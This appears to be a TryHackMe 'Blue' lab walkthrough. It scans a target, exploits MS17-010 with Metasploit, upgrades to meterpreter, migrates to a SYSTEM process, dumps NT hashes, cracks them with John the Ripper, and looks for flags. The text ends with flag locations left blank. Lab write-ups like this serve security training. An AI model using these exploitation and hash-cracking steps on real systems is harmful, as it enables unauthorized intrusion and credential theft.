Room Link: https://tryhackme.com/room/blue
we don't know the IP of the target so let's do a netdiscover scan to do it.
sudo netdiscover -i eth0 -r 10.0.2.0/24
now we know the IP of the target 10.0.2.21
now lets first do a Nmap scan.
sudo nmap -sC -sV -A (the targets IP) -oN nmap.txt
first question: How many ports are open with a port number under 1000?
second question: What is this machine vulnerable to? (Answer in the form of:
ms??-???, ex: ms08–067)?
for this let's do script scan.
sudo nmap -sC -A — script=vuln (IP address) -oN scriptscan.txt
note: this will take some time.
we have found that the machine is vulnerable to ms17–010.
so lets search for the Metasploit module.
and now we found that the Metasploit module is. exploit/windows/smb/
third question: Find the exploitation code we will run against the machine.
What is the full path of the code? (Ex: exploit/……..)
now let us start Metasploit,
now let us use the module
now let us set the options.
4th question: Show options and set the one required value. What is
the name of this value? (All caps for submission)
now lets set the RHOSTS, LHOST and the LPORT(optional)
set RHOSTS (IP of the target)
set LHOST (IP of your machine)
HOHO now we are ready to run the exploit type “run” to do it.
WOW, now we are in.
now let us background this and upgrade this shell to a meterpreter session for
more anonymity and more control.
to do it press ctrl+z
it is now done.
question 5: If you haven’t already, background the previously
gained shell (CTRL + Z). Research online on how to convert a shell
to meterpreter shell in Metasploit. What is the name of the post
the module we will use? (Exact path, similar to the exploit we
now to find this search for shell_to_meterpreter in msfconsole
now let's use this post module
by typing “use post/multi/manage/shell_to_meterpreter”
now let us see what options we need to set by typing “options”
now we know that we need to set sessions option because we already have
the session running in the background
question 6: Select this (use MODULE_PATH). Show options, what
option are we required to change? (All caps for answer)
now let us do this by searching for active sessions by typing “sessions”
now set the session by typing “set SESSION 1”
now type run to execute it
now we are good to go again list sessions and switch to meterpreter
session by typing “sessions -i 2”
now we are in
now let us migrate to a process running at NT AUTHORITY\SYSTEM
to do this first list all the processes by typing “ps”
now let us migrate to 1828 by typing “migrate 1828”
now we got password hashes of the user named Jon.
now let us crack the hash using john the ripper
to do that make a txt file and type the hash you got
now use the command
“john hash.txt -wordlist=usr/share/wordlists/rockyou.txt -format=NT”
and then to show the password type john hash.txt — show — format=NT
question 7: Copy this password hash to a file and research how to
crack it. What is the cracked password?
now let us find the flags
the first flag is found in C:\
to get it first got to the shell by typing “shell”
now list the files by typing “dir”
you can see the flag1.txt to read the flags use the command type
now let us find the second flag
second flags location is
the third flag is located in